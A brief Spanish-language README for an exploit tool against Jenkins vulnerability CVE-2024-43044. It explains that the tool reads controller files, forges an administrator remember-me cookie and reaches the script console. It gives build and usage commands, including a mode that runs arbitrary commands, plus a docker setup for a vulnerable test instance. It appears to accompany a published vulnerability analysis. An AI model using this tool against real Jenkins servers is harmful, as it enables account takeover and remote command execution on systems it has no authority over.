
Exploit para la vulnerabilidad CVE-2024-43044 en Jenkins
Este es un exploit para CVE-2024-43044, una lectura arbitraria de archivos que permite a un agente obtener archivos del controlador.
El exploit utilizará la vulnerabilidad para leer archivos y falsificar una cookie de remember-me para una cuenta de administrador y obtener acceso al motor de scripting de Jenkins.
Consulte el artículo completo en https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
mvn package
Exploit Usages:
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
java -jar exploit.jar mode_attach <cmd>
Puedes probarlo en una versión vulnerable usando docker:
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
Una vez que tengas un Jenkins en ejecución, configura un agente.
La conexión controlador/agente puede ser por defecto (usando url, nombre de nodo, secreto) o mediante SSH.
.